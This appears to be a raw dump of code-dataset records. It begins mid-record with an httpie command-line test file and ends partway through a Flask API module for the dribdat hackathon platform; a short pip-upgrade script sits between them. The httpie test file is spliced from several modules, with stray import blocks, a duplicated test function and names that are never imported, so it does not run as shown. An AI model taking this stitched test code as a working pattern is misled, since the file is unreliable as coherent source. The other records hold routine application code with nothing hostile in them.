CaseInsensitiveDict\n\nfrom httpie.compat import urlopen\nfrom httpie.downloads import (\n parse_content_range, filename_from_content_disposition, filename_from_url,\n get_unique_filename, ContentRangeError, Downloader,\n)\nfrom utils import http, TestEnvironment\n\n# coding=utf-8\n\"\"\"\nVarious unicode handling related tests.\n\n\"\"\"\nfrom utils import http, HTTP_OK\nfrom fixtures import UNICODE\n\nimport os\nimport fnmatch\nimport subprocess\n\nimport pytest\n\nfrom utils import TESTS_ROOT\n\n\"\"\"Miscellaneous regression 
tests\"\"\"\nimport pytest\n\nfrom utils import http, HTTP_OK\nfrom httpie.compat import is_windows\n\n\"\"\"CLI argument parsing related tests.\"\"\"\nimport json\n# noinspection PyCompatibility\nimport argparse\n\nimport pytest\nfrom requests.exceptions import InvalidSchema\n\nfrom httpie import input\nfrom httpie.input import KeyValue, KeyValueArgType, DataDict\nfrom httpie import ExitStatus\nfrom httpie.cli import parser\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import (\n FILE_PATH_ARG, JSON_FILE_PATH_ARG,\n JSON_FILE_CONTENT, FILE_CONTENT, FILE_PATH\n)\n\nimport pytest\n\nfrom httpie.compat import is_windows\nfrom httpie.output.streams import BINARY_SUPPRESSED_NOTICE\nfrom utils import http, TestEnvironment\nfrom fixtures import BIN_FILE_CONTENT, BIN_FILE_PATH\n\n\n# GET because httpbin 500s with binary POST body.\n\nimport mock\n\nfrom httpie import ExitStatus\nfrom utils import TestEnvironment, http, HTTP_OK\n\n\ndef test_follow_all_output_options_used_for_redirects(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 3\n assert HTTP_OK not in r\n\n\n@mock.patch('httpie.core.get_response')\ndef test_error(get_response):\n def error(msg, *args, **kwargs):\n global error_msg\n error_msg = msg % args\n\n exc = ConnectionError('Connection aborted')\n exc.request = Request(method='GET', url='http://www.google.com')\n get_response.side_effect = exc\n ret = main(['--ignore-stdin', 'www.google.com'], custom_log_error=error)\n assert ret == ExitStatus.ERROR\n assert error_msg == (\n 'ConnectionError: '\n 'Connection aborted while doing GET request to URL: '\n 'http://www.google.com')\n\n\ndef test_default_options_overwrite(httpbin):\n env = TestEnvironment()\n env.config['default_options'] = ['--form']\n env.config.save()\n r = http('--json', httpbin.url + '/post', 'foo=bar', env=env)\n assert r.json['json'] == {\"foo\": \"bar\"}\n\n\ndef test_3xx_check_status_redirects_allowed_exits_0(httpbin):\n r = http('--check-status', '--follow',\n 'GET', httpbin.url + '/status/301',\n error_exit_ok=True)\n # The redirect will be followed so 200 is expected.\n assert HTTP_OK in r\n assert r.exit_status == ExitStatus.OK\n\n\nclass TestLineEndings:\n \"\"\"\n Test that CRLF is properly used in headers\n and as the headers/body separator.\n\n \"\"\"\n def _validate_crlf(self, msg):\n lines = iter(msg.splitlines(True))\n for header in lines:\n if header == CRLF:\n break\n assert header.endswith(CRLF), repr(header)\n else:\n assert 0, 'CRLF between headers and body not found in %r' % msg\n body = ''.join(lines)\n assert CRLF not in body\n return body\n\n def test_CRLF_headers_only(self, httpbin):\n r = http('--headers', 'GET', httpbin.url + '/get')\n body = self._validate_crlf(r)\n assert not body, 'Garbage after headers: %r' % r\n\n def test_CRLF_ugly_response(self, httpbin):\n r = http('--pretty=none', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\n def test_CRLF_formatted_response(self, httpbin):\n r = http('--pretty=format', 'GET', httpbin.url + '/get')\n assert r.exit_status == ExitStatus.OK\n self._validate_crlf(r)\n\n def test_CRLF_ugly_request(self, httpbin):\n r = http('--pretty=none', '--print=HB', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\n def test_CRLF_formatted_request(self, httpbin):\n r = http('--pretty=format', '--print=HB', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\ndef test_unicode_headers_verbose(httpbin):\n # httpbin doesn't interpret utf8 
headers\n    r = http('--verbose', httpbin.url + '/headers', u'Test:%s' % UNICODE)\n    assert HTTP_OK in r\n    assert UNICODE in r\n\n\n@pytest.mark.skip('unimplemented')\ndef test_unset_host_header(httpbin_both):\n    r = http('GET', httpbin_both + '/headers')\n    assert 'Host' in r.json['headers']  # default Host present\n\n    r = http('GET', httpbin_both + '/headers', 'Host:')\n    assert 'Host' not in r.json['headers']  # default Host unset\n\n\n@pytest.mark.parametrize('follow_flag', ['--follow', '-F'])\ndef test_follow_without_all_redirects_hidden(httpbin, follow_flag):\n    r = http(follow_flag, httpbin.url + '/redirect/2')\n    assert r.count('HTTP/1.1') == 1\n    assert HTTP_OK in r\n\n\ndef test_follow_all_redirects_shown(httpbin):\n    r = http('--follow', '--all', httpbin.url + '/redirect/2')\n    assert r.count('HTTP/1.1') == 3\n    assert r.count('HTTP/1.1 302 FOUND') == 2\n    assert HTTP_OK in r\n\n\nclass TestMultipartFormDataFileUpload:\n\n    def test_non_existent_file_raises_parse_error(self, httpbin):\n        with pytest.raises(ParseError):\n            http('--form',\n                 'POST', httpbin.url + '/post', 'foo@/__does_not_exist__')\n\n    def test_upload_ok(self, httpbin):\n        r = http('--form', '--verbose', 'POST', httpbin.url + '/post',\n                 'test-file@%s' % FILE_PATH_ARG, 'foo=bar')\n        assert HTTP_OK in r\n        assert 'Content-Disposition: form-data; name=\"foo\"' in r\n        assert 'Content-Disposition: form-data; name=\"test-file\";' \\\n               ' filename=\"%s\"' % os.path.basename(FILE_PATH) in r\n        assert FILE_CONTENT in r\n        assert '\"foo\": \"bar\"' in r\n        assert 'Content-Type: text/plain' in r\n\n    def test_upload_multiple_fields_with_the_same_name(self, httpbin):\n        r = http('--form', '--verbose', 'POST', httpbin.url + '/post',\n                 'test-file@%s' % FILE_PATH_ARG,\n                 'test-file@%s' % FILE_PATH_ARG)\n        assert HTTP_OK in r\n        assert r.count('Content-Disposition: form-data; name=\"test-file\";'\n                       ' filename=\"%s\"' % os.path.basename(FILE_PATH)) == 2\n        # Should be 4, but is 3 because httpbin\n        # doesn't seem to support file field lists\n        assert r.count(FILE_CONTENT) in [3, 4]\n        assert r.count('Content-Type: text/plain') == 2\n\n\ndef test_default_options(httpbin):\n    env = TestEnvironment()\n    env.config['default_options'] = ['--form']\n    env.config.save()\n    r = http(httpbin.url + '/post', 'foo=bar', env=env)\n    assert r.json['form'] == {\"foo\": \"bar\"}\n\n\nclass TestPrettyOptions:\n    \"\"\"Test the --pretty flag handling.\"\"\"\n\n    def test_pretty_enabled_by_default(self, httpbin):\n        env = TestEnvironment(colors=256)\n        r = http('GET', httpbin.url + '/get', env=env)\n        assert COLOR in r\n\n    def test_pretty_enabled_by_default_unless_stdout_redirected(self, httpbin):\n        r = http('GET', httpbin.url + '/get')\n        assert COLOR not in r\n\n    def test_force_pretty(self, httpbin):\n        env = TestEnvironment(stdout_isatty=False, colors=256)\n        r = http('--pretty=all', 'GET', httpbin.url + '/get', env=env, )\n        assert COLOR in r\n\n    def test_force_ugly(self, httpbin):\n        r = http('--pretty=none', 'GET', httpbin.url + '/get')\n        assert COLOR not in r\n\n    def test_subtype_based_pygments_lexer_match(self, httpbin):\n        \"\"\"Test that media subtype is used if type/subtype doesn't\n        match any lexer.\n\n        \"\"\"\n        env = TestEnvironment(colors=256)\n        r = http('--print=B', '--pretty=all', httpbin.url + '/post',\n                 'Content-Type:text/foo+json', 'a=b', env=env)\n        assert COLOR in r\n\n    def test_colors_option(self, httpbin):\n        env = TestEnvironment(colors=256)\n        r = http('--print=B', '--pretty=colors',\n                 'GET', httpbin.url + '/get', 'a=b',\n                 env=env)\n        # Tests that the JSON data isn't formatted.\n        
assert not r.strip().count('\\n')\n assert COLOR in r\n\n def test_format_option(self, httpbin):\n env = TestEnvironment(colors=256)\n r = http('--print=B', '--pretty=format',\n 'GET', httpbin.url + '/get', 'a=b',\n env=env)\n # Tests that the JSON data is formatted.\n assert r.strip().count('\\n') == 2\n assert COLOR not in r\n\n\ndef test_unicode_form_item(httpbin):\n r = http('--form', 'POST', httpbin.url + '/post', u'test=%s' % UNICODE)\n assert HTTP_OK in r\n assert r.json['form'] == {'test': UNICODE}\n\n\ndef test_auth_plugin_parse_auth_false(httpbin):\n\n class Plugin(AuthPlugin):\n auth_type = 'test-parse-false'\n auth_parse = False\n\n def get_auth(self, username=None, password=None):\n assert username is None\n assert password is None\n assert self.raw_auth == BASIC_AUTH_HEADER_VALUE\n return basic_auth(self.raw_auth)\n\n plugin_manager.register(Plugin)\n try:\n r = http(\n httpbin + BASIC_AUTH_URL,\n '--auth-type',\n Plugin.auth_type,\n '--auth',\n BASIC_AUTH_HEADER_VALUE,\n )\n assert HTTP_OK in r\n assert r.json == AUTH_OK\n finally:\n plugin_manager.unregister(Plugin)\n\n\ndef test_follow_redirect_output_options(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=h',\n '--history-print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 2\n assert 'HTTP/1.1 302 FOUND' not in r\n assert HTTP_OK in r\n\n\ndef test_Host_header_overwrite(httpbin):\n \"\"\"\n https://github.com/jakubroztocil/httpie/issues/235\n\n \"\"\"\n host = 'httpbin.org'\n url = httpbin.url + '/get'\n r = http('--print=hH', url, 'host:{0}'.format(host))\n assert HTTP_OK in r\n assert r.lower().count('host:') == 1\n assert 'host: {0}'.format(host) in r\n\n\ndef test_follow_all_output_options_used_for_redirects(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 3\n assert HTTP_OK not in r\n\n\ndef test_unicode_url(httpbin):\n r = http(httpbin.url + u'/get?test=' + UNICODE)\n assert HTTP_OK in r\n assert r.json['args'] == {'test': UNICODE}\n\n# def test_unicode_url_verbose(self):\n# r = http(httpbin.url + '--verbose', u'/get?test=' + UNICODE)\n# assert HTTP_OK in r\n\n\ndef test_credentials_in_url_auth_flag_has_priority(httpbin_both):\n \"\"\"When credentials are passed in URL and via -a at the same time,\n then the ones from -a are used.\"\"\"\n url = add_auth(httpbin_both.url + '/basic-auth/user/password',\n auth='user:wrong')\n r = http('--auth=user:password', 'GET', url)\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\n@pytest.mark.skipif(is_windows, reason='Unix-only')\ndef test_output_devnull(httpbin):\n \"\"\"\n https://github.com/jakubroztocil/httpie/issues/252\n\n \"\"\"\n http('--output=/dev/null', httpbin + '/get')\n\ndef test_help():\n r = http('--help', error_exit_ok=True)\n assert r.exit_status == httpie.ExitStatus.OK\n assert 'https://github.com/jakubroztocil/httpie/issues' in r\n\n\ndef test_POST_form(httpbin_both):\n r = http('--form', 'POST', httpbin_both + '/post', 'foo=bar')\n assert HTTP_OK in r\n assert '\"foo\": \"bar\"' in r\n\n\n@mock.patch('httpie.input.AuthCredentials._getpass',\n new=lambda self, prompt: 'password')\ndef test_password_prompt(httpbin):\n r = http('--auth', 'user',\n 'GET', httpbin.url + '/basic-auth/user/password')\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\nclass TestDownloads:\n # TODO: more tests\n\n def test_actual_download(self, httpbin_both, httpbin):\n robots_txt 
= '/robots.txt'\n body = urlopen(httpbin + robots_txt).read().decode()\n env = TestEnvironment(stdin_isatty=True, stdout_isatty=False)\n r = http('--download', httpbin_both.url + robots_txt, env=env)\n assert 'Downloading' in r.stderr\n assert '[K' in r.stderr\n assert 'Done' in r.stderr\n assert body == r\n\n def test_download_with_Content_Length(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(\n url=httpbin_both.url + '/',\n headers={'Content-Length': 10}\n ))\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n downloader.finish()\n assert not downloader.interrupted\n\n def test_download_no_Content_Length(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(url=httpbin_both.url + '/'))\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n downloader.finish()\n assert not downloader.interrupted\n\n def test_download_interrupted(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(\n url=httpbin_both.url + '/',\n headers={'Content-Length': 5}\n ))\n downloader.chunk_downloaded(b'1234')\n downloader.finish()\n assert downloader.interrupted\n\ndef test_headers_empty_value_with_value_gives_error(httpbin):\n with pytest.raises(ParseError):\n http('GET', httpbin + '/headers', 'Accept;SYNTAX_ERROR')\n\n\ndef test_redirected_stream(httpbin):\n \"\"\"Test that --stream works with non-prettified\n redirected terminal output.\"\"\"\n with open(BIN_FILE_PATH, 'rb') as f:\n env = TestEnvironment(stdout_isatty=False,\n stdin_isatty=False,\n stdin=f)\n r = http('--pretty=none', '--stream', '--verbose', 'GET',\n httpbin.url + '/get', env=env)\n assert BIN_FILE_CONTENT in r\n\ndef test_unicode_json_item(httpbin):\n r = http('--json', 'POST', httpbin.url + '/post', u'test=%s' % UNICODE)\n assert HTTP_OK in r\n assert r.json['json'] == {'test': UNICODE}\n\n\n@pytest.mark.parametrize('argument_name', ['--auth-type', '-A'])\ndef test_digest_auth(httpbin_both, argument_name):\n r = http(argument_name + '=digest', '--auth=user:password',\n 'GET', httpbin_both.url + '/digest-auth/auth/user/password')\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\ndef test_POST_form_multiple_values(httpbin_both):\n r = http('--form', 'POST', httpbin_both + '/post', 'foo=bar', 'foo=baz')\n assert HTTP_OK in r\n assert r.json['form'] == {'foo': ['bar', 'baz']}\n\n\ndef test_3xx_check_status_exits_3_and_stderr_when_stdout_redirected(\n httpbin):\n env = TestEnvironment(stdout_isatty=False)\n r = http('--check-status', '--headers',\n 'GET', httpbin.url + '/status/301',\n env=env, error_exit_ok=True)\n assert '301 MOVED PERMANENTLY' in r\n assert r.exit_status == ExitStatus.ERROR_HTTP_3XX\n assert '301 moved permanently' in r.stderr.lower()\n\n","sub_path":"httpie_tests/test_suite_22.py","file_name":"test_suite_22.py","file_ext":"py","file_size_in_byte":18174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"597242328","text":"\"\"\"\nUpgrades all site packages for specified\npython version.\n\n\"\"\"\n\n# Relevant library imports\nimport subprocess\n\n# Specify Python version and requirements file\npy_version = 'python3.7'\nreqs_file = '../Desktop/' + 
'_'.join(py_version.split('.')) + '_requirements.txt'\n\n# Create requirements file from which to upgrade packages\nreq_cmd = subprocess.run(py_version + ' -m pip freeze > ' + reqs_file, shell=True)\n\n# Open requirements file and make relevant upgrades\nwith open(reqs_file) as requirements_file:\n    for line in requirements_file:\n        upgrade_cmd = subprocess.run(py_version + ' -m pip install --upgrade ' + line.strip().split('==')[0], shell=True, capture_output=True)\n        print(upgrade_cmd.stdout.decode())\n\n","sub_path":"upgrade_site_packages.py","file_name":"upgrade_site_packages.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"321794518","text":"# -*- coding: utf-8 -*-\n\nimport boto3\nfrom frictionless import Package, Resource\nfrom flask import (\n    Blueprint, current_app,\n    Response, request,\n    stream_with_context, send_file,\n    jsonify,\n)\nfrom flask_login import login_required, current_user\n\nfrom sqlalchemy import or_\n\nfrom ..extensions import db\nfrom ..utils import timesince, random_password, format_date\nfrom ..decorators import admin_required\n\nfrom ..user.models import Event, Project, Activity\nfrom ..aggregation import GetProjectData, AddProjectData, GetEventUsers\nfrom ..apipackage import ImportEventPackage, ImportEventByURL\nfrom ..apiutils import (\n    get_projects_by_event, get_project_summaries,\n    get_event_users, get_event_activities,\n    get_event_categories,\n    expand_project_urls,\n    gen_csv,\n)\n\nfrom datetime import datetime\nimport tempfile\n\nblueprint = Blueprint('api', __name__, url_prefix='/api')\n\n\n# ------ EVENT INFORMATION ---------\n\n@blueprint.route('/event/current/info.json')\ndef info_current_event_json():\n    \"\"\" API: Outputs JSON about the current event \"\"\"\n    event = Event.query.filter_by(is_current=True).first() or \\\n        Event.query.order_by(Event.id.desc()).first_or_404()\n    timeuntil = timesince(event.countdown, until=True)\n    return jsonify(event=event.data, timeuntil=timeuntil)\n\n\n@blueprint.route('/event/<int:event_id>/info.json')\ndef info_event_json(event_id):\n    \"\"\" API: Outputs JSON about an event \"\"\"\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    timeuntil = timesince(event.countdown, until=True)\n    return jsonify(event=event.data, timeuntil=timeuntil)\n\n\n@blueprint.route('/event/<int:event_id>/hackathon.json')\ndef info_event_hackathon_json(event_id):\n    \"\"\" API: Outputs JSON-LD about an Event according to schema \"\"\"\n    \"\"\" See https://schema.org/Hackathon \"\"\"\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    return jsonify(event.get_schema(request.host_url))\n\n# ------ EVENT PROJECTS ---------\n\n\ndef project_list(event_id, full_data=False):\n    \"\"\" Collect all projects and challenges for an event \"\"\"\n    is_moar = bool(request.args.get('moar', type=bool)) or full_data\n    projects = get_projects_by_event(event_id)\n    host_url = request.host_url\n    return get_project_summaries(projects, host_url, is_moar)\n\n\n@blueprint.route('/event/current/projects.json')\ndef project_list_current_json():\n    \"\"\" API: Outputs JSON of projects in the current event with its info \"\"\"\n    event = Event.query.filter_by(is_current=True).first() or \\\n        Event.query.order_by(Event.id.desc()).first_or_404()\n    return jsonify(projects=project_list(event.id), event=event.data)\n\n\n@blueprint.route('/event/<int:event_id>/projects.json')\ndef project_list_json(event_id):\n    \"\"\" API: Outputs JSON of all projects at a specific event \"\"\"\n    return 
jsonify(projects=project_list(event_id))\n\n\ndef project_list_csv(event_id, event_name):\n    headers = {\n        'Content-Disposition': 'attachment; filename='\n        + event_name + '_dribdat.csv'\n    }\n    return Response(stream_with_context(gen_csv(project_list(event_id))),\n                    mimetype='text/csv',\n                    headers=headers)\n\n\n@blueprint.route('/event/<int:event_id>/projects.csv')\ndef project_list_event_csv(event_id):\n    \"\"\" API: Outputs CSV of all projects in an event \"\"\"\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    return project_list_csv(event.id, event.name)\n\n\n@blueprint.route('/event/current/projects.csv')\ndef project_list_current_csv():\n    \"\"\" API: Outputs CSV of projects and challenges in the current event \"\"\"\n    event = Event.query.filter_by(is_current=True).first() or \\\n        Event.query.order_by(Event.id.desc()).first_or_404()\n    return project_list_csv(event.id, event.name)\n\n\n@blueprint.route('/event/current/categories.json')\ndef categories_list_current_json():\n    \"\"\" API: Outputs JSON of categories in the current event \"\"\"\n    event = Event.query.filter_by(is_current=True).first()\n    categories = [c.data for c in event.categories_for_event()]\n    return jsonify(categories=categories, event=event.data)\n\n# ------ ACTIVITY FEEDS ---------\n\n\n@blueprint.route('/event/<int:event_id>/activity.json')\ndef event_activity_json(event_id):\n    \"\"\" API: Outputs JSON of recent activity in an event \"\"\"\n    limit = request.args.get('limit') or 50\n    q = request.args.get('q') or None\n    if q and len(q) < 3:\n        q = None\n    return jsonify(activities=get_event_activities(event_id, limit, q))\n\n\n@blueprint.route('/event/current/activity.json')\ndef event_activity_current_json():\n    \"\"\" API: Outputs JSON of recent activity in the current event \"\"\"\n    event = Event.query.filter_by(is_current=True).first()\n    if not event:\n        return jsonify(activities=[])\n    return event_activity_json(event.id)\n\n\n@blueprint.route('/event/<int:event_id>/activity.csv')\ndef event_activity_csv(event_id):\n    \"\"\" API: Outputs CSV of an event's activity \"\"\"\n    limit = request.args.get('limit') or 50\n    q = request.args.get('q') or None\n    if q and len(q) < 3:\n        q = None\n    csvstream = gen_csv(get_event_activities(event_id, limit, q))\n    headers = {'Content-Disposition': 'attachment; filename=activity_list.csv'}\n    return Response(stream_with_context(csvstream),\n                    mimetype='text/csv', headers=headers)\n\n\n@blueprint.route('/project/activity.json')\ndef projects_activity_json():\n    \"\"\" API: Outputs JSON of recent activity across all projects \"\"\"\n    limit = request.args.get('limit') or 10\n    q = request.args.get('q') or None\n    if q and len(q) < 3:\n        q = None\n    return jsonify(activities=get_event_activities(None, limit, q))\n\n\n@blueprint.route('/project/posts.json')\ndef projects_posts_json():\n    \"\"\" API: Outputs JSON of recent posts (activity) across projects \"\"\"\n    limit = request.args.get('limit') or 10\n    q = request.args.get('q') or None\n    if q and len(q) < 3:\n        q = None\n    return jsonify(activities=get_event_activities(None, limit, q, \"post\"))\n\n\n@blueprint.route('/project/<int:project_id>/activity.json')\ndef project_activity_json(project_id):\n    \"\"\" API: Outputs JSON of recent activity of a project \"\"\"\n    limit = request.args.get('limit') or 10\n    project = Project.query.filter_by(id=project_id).first_or_404()\n    query = Activity.query.filter_by(project_id=project.id).order_by(\n        Activity.id.desc()).limit(limit).all()\n    activities = [a.data for a in query]\n    return jsonify(project=project.data, 
activities=activities)\n\n\n@blueprint.route('/project/<int:project_id>/info.json')\ndef project_info_json(project_id):\n    \"\"\" API: Outputs JSON info for a specific project \"\"\"\n    project = Project.query.filter_by(id=project_id).first_or_404()\n    activities = []\n    for user in project.team():\n        activities.append({\n            'id': user.id,\n            'name': user.username,\n            'link': user.webpage_url\n        })\n\n    data = {\n        'project': project.data,\n        'phase': project.phase,\n        'pitch': project.webembed,\n        'is_webembed': project.is_webembed,\n        'event': project.event.data,\n        'creator': {\n            'id': project.user.id,\n            'username': project.user.username\n        },\n        'team': activities\n    }\n\n    return jsonify(data)\n\n# ------ USERS ----------\n\n\n@blueprint.route('/event/<int:event_id>/participants.csv')\n@admin_required\ndef event_participants_csv(event_id):\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    userlist = [u.data for u in GetEventUsers(event)]\n    headers = {\n        'Content-Disposition': 'attachment; '\n        + 'filename=user_list_%d.csv' % event.id\n    }\n    return Response(stream_with_context(gen_csv(userlist)),\n                    mimetype='text/csv',\n                    headers=headers)\n\n\n# ------ SEARCH ---------\n\n@blueprint.route('/project/search.json')\ndef project_search_json():\n    \"\"\" API: Full text search projects \"\"\"\n    q = request.args.get('q')\n    if q is None or len(q) < 3:\n        return jsonify(projects=[])\n    limit = request.args.get('limit') or 10\n    q = \"%%%s%%\" % q\n    projects = Project.query.filter(or_(\n        Project.name.like(q),\n        Project.summary.like(q),\n        Project.longtext.like(q),\n        Project.autotext.like(q),\n    )).limit(limit).all()\n    projects = expand_project_urls(\n        [p.data for p in projects],\n        request.host_url\n    )\n    return jsonify(projects=projects)\n\n# ------ UPDATE ---------\n\n\n@blueprint.route('/event/load/datapackage', methods=[\"GET\"])\n@admin_required\ndef event_load_datapackage():\n    \"\"\" API: Loads event data from URL \"\"\"\n    url = request.args.get('url')\n    if not url or 'datapackage.json' not in url:\n        return jsonify(status='Error', errors=['Missing datapackage.json url'])\n    dry_run = True\n    all_data = False\n    status = \"Preview\"\n    import_level = request.args.get('import')\n    if import_level == 'basic':\n        dry_run = False\n        status = \"Basic\"\n    if import_level == 'full':\n        dry_run = False\n        all_data = True\n        status = \"Complete\"\n    results = ImportEventByURL(url, dry_run, all_data)\n    if 'errors' in results:\n        return jsonify(status='Error', errors=results['errors'])\n    return jsonify(status=status, results=results)\n\n\n@blueprint.route('/event/push/datapackage', methods=[\"PUT\", \"POST\"])\ndef event_push_datapackage():\n    \"\"\" API: Pushes event data \"\"\"\n    key = request.headers.get('key')\n    if not key or key != current_app.config['SECRET_API']:\n        return jsonify(status='Error', errors=['Invalid API key'])\n    data = request.get_json(force=True)\n    results = ImportEventPackage(data)\n    if 'errors' in results:\n        return jsonify(status='Error', errors=results['errors'])\n    return jsonify(status='Complete', results=results)\n\n\n@blueprint.route('/project/push.json', methods=[\"PUT\", \"POST\"])\ndef project_push_json():\n    \"\"\" API: Pushes data into a project \"\"\"\n    data = request.get_json(force=True)\n    if 'key' not in data or data['key'] != current_app.config['SECRET_API']:\n        return jsonify(error='Invalid key')\n    project = Project.query.filter_by(hashtag=data['hashtag']).first()\n    if not project:\n        project = Project()\n        project.user_id = 1\n        project.progress = 0\n        # project.autotext_url = \"#bot\"\n        # project.is_autoupdate = True\n        
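# Newly created projects are attached to the event currently marked as active\n        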
project.event = Event.query.filter_by(is_current=True).first()\n elif project.user_id != 1 or project.is_hidden:\n return jsonify(error='Access denied')\n project.hashtag = data['hashtag']\n if 'name' in data and len(data['name']) > 0:\n project.name = data['name']\n else:\n project.name = project.hashtag.replace('-', ' ')\n if 'summary' in data and len(data['summary']) > 0:\n project.summary = data['summary']\n hasLongtext = 'longtext' in data and len(data['longtext']) > 0\n if hasLongtext:\n project.longtext = data['longtext']\n if 'autotext_url' in data and data['autotext_url'].startswith('http'):\n project.autotext_url = data['autotext_url']\n if not project.source_url or project.source_url == '':\n project.source_url = data['autotext_url']\n # MAX progress\n if 'levelup' in data and 0 < project.progress + data['levelup'] * 10 < 50:\n project.progress = project.progress + data['levelup'] * 10\n # return jsonify(data=data)\n if project.autotext_url is not None and not hasLongtext:\n # Now try to autosync\n project = AddProjectData(project)\n project.update()\n db.session.add(project)\n db.session.commit()\n return jsonify(success='Updated', project=project.data)\n\n# ------ FRONTEND -------\n\n\n@blueprint.route('/project/autofill', methods=['GET', 'POST'])\n@login_required\ndef project_autofill():\n \"\"\" API routine used to help sync project data \"\"\"\n url = request.args.get('url')\n data = GetProjectData(url)\n return jsonify(data)\n\n\n# TODO: move to separate upload.py ?\n\nACCEPTED_TYPES = ['png', 'jpg', 'jpeg', 'gif', 'json']\n\n\n@blueprint.route('/project/uploader', methods=[\"POST\"])\n@login_required\ndef project_uploader():\n \"\"\" API: Enables uploading images and files into a project \"\"\"\n if not current_app.config['S3_KEY']:\n return ''\n if len(request.files) == 0:\n return 'No files selected'\n img = request.files['file']\n if not img or img.filename == '':\n return 'No filename'\n ext = img.filename.split('.')[-1].lower()\n if ext not in ACCEPTED_TYPES:\n return 'Invalid format'\n filename = random_password(24) + '.' 
+ ext\n    # with tempfile.TemporaryDirectory() as tmpdir:\n    #     img.save(path.join(tmpdir, filename))\n    if 'S3_FOLDER' in current_app.config:\n        s3_filepath = '/'.join([current_app.config['S3_FOLDER'], filename])\n    else:\n        s3_filepath = filename\n    # print('Uploading to %s' % s3_filepath)\n    if 'S3_ENDPOINT' in current_app.config:\n        s3_obj = boto3.client(\n            service_name='s3',\n            endpoint_url=current_app.config['S3_ENDPOINT'],\n            aws_access_key_id=current_app.config['S3_KEY'],\n            aws_secret_access_key=current_app.config['S3_SECRET'],\n        )\n    else:\n        s3_obj = boto3.client(\n            service_name='s3',\n            region_name=current_app.config['S3_REGION'],\n            aws_access_key_id=current_app.config['S3_KEY'],\n            aws_secret_access_key=current_app.config['S3_SECRET'],\n        )\n    # Commence upload\n    s3_obj.upload_fileobj(img,\n                          current_app.config['S3_BUCKET'],\n                          s3_filepath,\n                          ExtraArgs={'ContentType': img.content_type,\n                                     'ACL': 'public-read'}\n                          )\n    return '/'.join([current_app.config['S3_HTTPS'], s3_filepath])\n\n\n# TODO: move to packager.py ?\n\n\n@blueprint.route('/event/current/datapackage.<format>', methods=[\"GET\"])\n@login_required\ndef package_current_event(format):\n    event = Event.query.filter_by(is_current=True).first() or \\\n        Event.query.order_by(Event.id.desc()).first_or_404()\n    return package_event(event, format)\n\n\n@blueprint.route('/event/<int:event_id>/datapackage.<format>', methods=[\"GET\"])\n@login_required\ndef package_specific_event(event_id, format):\n    event = Event.query.filter_by(id=event_id).first_or_404()\n    return package_event(event, format)\n\n\ndef package_event(event, format):\n    if format not in ['zip', 'json']:\n        return \"Format not supported\"\n    # Set up a data package\n    package = Package(\n        name='event-%d' % event.id,\n        title=event.name,\n        description=\"Event and project details collected with dribdat\",\n        keywords=[\"dribdat\", \"hackathon\", \"co-creation\"],\n        sources=[{\n            \"title\": \"dribdat\", \"path\": \"https://dribdat.cc\"\n        }],\n        licenses=[{\n            \"name\": \"ODC-PDDL-1.0\",\n            \"path\": \"http://opendatacommons.org/licenses/pddl/\",\n            \"title\": \"Open Data Commons Public Domain Dedication & License 1.0\"\n        }],\n        contributors=[{\n            \"title\": current_user.username,\n            \"path\": current_user.webpage_url or '',\n            \"role\": \"author\"\n        }],\n        homepage=request.host_url,\n        created=format_date(datetime.now(), '%Y-%m-%dT%H:%M'),\n        version=\"0.1.0\",\n    )\n\n    # if False:  # as CSV\n    #     fp_projects = tempfile.NamedTemporaryFile(\n    #         mode='w+t', prefix='projects-', suffix='.csv')\n    #     # print(\"Writing to temp CSV file\", fp_projects.name)\n    #     fp_projects.write(gen_csv(project_list(event.id)))\n    #     resource = Resource(fp_projects.name)\n    #     if False:\n    #         # print(\"Generating in-memory rowset\")\n    #         project_rows = gen_rows(project_list(event.id))\n    #         resource = Resource(\n    #             name='projects',\n    #             data=project_rows,\n    #         )\n\n    # Generate resources\n    # print(\"Generating in-memory JSON of event\")\n    package.add_resource(Resource(\n        name='events',\n        data=[event.get_full_data()],\n    ))\n    # print(\"Generating in-memory JSON of projects\")\n    package.add_resource(Resource(\n        name='projects',\n        data=project_list(event.id, True),\n    ))\n    if format == 'zip':\n        # print(\"Generating in-memory JSON of participants\")\n        package.add_resource(Resource(\n            name='users',\n            data=get_event_users(event),\n        ))\n        # print(\"Generating in-memory JSON of activities\")\n        package.add_resource(Resource(\n            name='activities',\n            data=get_event_activities(event.id, 500),\n        ))\n        # print(\"Generating in-memory JSON of categories\")\n        package.add_resource(Resource(\n            
